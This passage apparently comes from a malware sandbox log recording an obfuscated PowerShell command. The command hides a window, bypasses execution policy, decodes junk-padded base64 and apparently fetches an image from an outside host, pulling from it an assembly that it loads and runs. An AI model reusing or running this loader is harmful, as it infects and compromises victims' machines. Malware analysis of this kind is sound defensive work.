KGXhpYIrIKGXPQhpYIrIKGXghpYIrIKGXCQhpYIrIKGXdhpYIrIKGXB5hpYIrIKGXHhpYIrIKGXhpYIrIKGXZQhpYIrIKGXuhpYIrIKGXEchpYIrIKGXZQB0hpYIrIKGXE0hpYIrIKGXZQB0hpYIrIKGXGghpYIrIKGXbwBkhpYIrIKGXCghpYIrIKGXJwBWhpYIrIKGXEEhpYIrIKGXSQhpYIrIKGXnhpYIrIKGXCkhpYIrIKGXLgBJhpYIrIKGXG4hpYIrIKGXdgBvhpYIrIKGXGshpYIrIKGXZQhpYIrIKGXohpYIrIKGXCQhpYIrIKGXbgB1hpYIrIKGXGwhpYIrIKGXbhpYIrIKGXhpYIrIKGXshpYIrIKGXChpYIrIKGXhpYIrIKGXWwBvhpYIrIKGXGIhpYIrIKGXagBlhpYIrIKGXGMhpYIrIKGXdhpYIrIKGXBbhpYIrIKGXF0hpYIrIKGXXQhpYIrIKGXghpYIrIKGXCghpYIrIKGXJwBkhpYIrIKGXEghpYIrIKGXahpYIrIKGXhpYIrIKGXwhpYIrIKGXEwhpYIrIKGXbgBOhpYIrIKGXHIhpYIrIKGXYgBthpYIrIKGXGwhpYIrIKGXTQBlhpYIrIKGXFghpYIrIKGXUghpYIrIKGXwhpYIrIKGXGQhpYIrIKGXVgBBhpYIrIKGXHYhpYIrIKGXWgBXhpYIrIKGXHghpYIrIKGXchpYIrIKGXBahpYIrIKGXGkhpYIrIKGXOhpYIrIKGXB5hpYIrIKGXE0hpYIrIKGXVhpYIrIKGXBJhpYIrIKGXHUhpYIrIKGXTQB6hpYIrIKGXEUhpYIrIKGXehpYIrIKGXBMhpYIrIKGXGohpYIrIKGXVQhpYIrIKGXzhpYIrIKGXE0hpYIrIKGXUwhpYIrIKGX0hpYIrIKGXDMhpYIrIKGXTQBEhpYIrIKGXEUhpYIrIKGXdgBMhpYIrIKGXHohpYIrIKGXchpYIrIKGXB3hpYIrIKGXGQhpYIrIKGXShpYIrIKGXBShpYIrIKGXG8hpYIrIKGXJwhpYIrIKGXghpYIrIKGXCwhpYIrIKGXIhpYIrIKGXhpYIrIKGXnhpYIrIKGXGQhpYIrIKGXZgBkhpYIrIKGXGYhpYIrIKGXZhpYIrIKGXhpYIrIKGXnhpYIrIKGXChpYIrIKGXhpYIrIKGXLhpYIrIKGXhpYIrIKGXghpYIrIKGXCchpYIrIKGXZhpYIrIKGXBmhpYIrIKGXGQhpYIrIKGXZghpYIrIKGXnhpYIrIKGXChpYIrIKGXhpYIrIKGXLhpYIrIKGXhpYIrIKGXghpYIrIKGXCchpYIrIKGXZhpYIrIKGXBmhpYIrIKGXGQhpYIrIKGXZghpYIrIKGXnhpYIrIKGXChpYIrIKGXhpYIrIKGXLhpYIrIKGXhpYIrIKGXghpYIrIKGXCchpYIrIKGXZhpYIrIKGXBhhpYIrIKGXGQhpYIrIKGXcwBhhpYIrIKGXCchpYIrIKGXIhpYIrIKGXhpYIrIKGXshpYIrIKGXChpYIrIKGXhpYIrIKGXJwBkhpYIrIKGXGUhpYIrIKGXJwhpYIrIKGXghpYIrIKGXCwhpYIrIKGXIhpYIrIKGXhpYIrIKGXnhpYIrIKGXGMhpYIrIKGXdQhpYIrIKGXnhpYIrIKGXCkhpYIrIKGXKQhpYIrIKGX=';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('hpYIrIKGX','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
cmdline powershell -command "$Codigo = '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KGXkhpYIrIKGXHMhpYIrIKGXdhpYIrIKGXBhhpYIrIKGXHIhpYIrIKGXdhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGchpYIrIKGXZQhpYIrIKGXghpYIrIKGXDhpYIrIKGXhpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGEhpYIrIKGXbgBkhpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGchpYIrIKGXdhpYIrIKGXhpYIrIKGXghpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEkhpYIrIKGXbgBkhpYIrIKGXGUhpYIrIKGXehpYIrIKGXhpYIrIKGX7hpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEkhpYIrIKGXbgBkhpYIrIKGXGUhpYIrIKGXehpYIrIKGXhpYIrIKGXghpYIrIKGXCshpYIrIKGXPQhpYIrIKGXghpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEYhpYIrIKGXbhpYIrIKGXBhhpYIrIKGXGchpYIrIKGXLgBMhpYIrIKGXGUhpYIrIKGXbgBnhpYIrIKGXHQhpYIrIKGXahpYIrIKGXhpYIrIKGX7hpYIrIKGXCQhpYIrIKGXYgBhhpYIrIKGXHMhpYIrIKGXZQhpYIrIKGX2hpYIrIKGXDQhpYIrIKGXThpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZwB0hpYIrIKGXGghpYIrIKGXIhpYIrIKGXhpYIrIKGX9hpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBzhpYIrIKGXHQh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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('hpYIrIKGX','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2140
thread_handle: 0x000002f8
process_identifier: 2136
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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KGXkhpYIrIKGXHMhpYIrIKGXdhpYIrIKGXBhhpYIrIKGXHIhpYIrIKGXdhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGchpYIrIKGXZQhpYIrIKGXghpYIrIKGXDhpYIrIKGXhpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGEhpYIrIKGXbgBkhpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGchpYIrIKGXdhpYIrIKGXhpYIrIKGXghpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEkhpYIrIKGXbgBkhpYIrIKGXGUhpYIrIKGXehpYIrIKGXhpYIrIKGX7hpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEkhpYIrIKGXbgBkhpYIrIKGXGUhpYI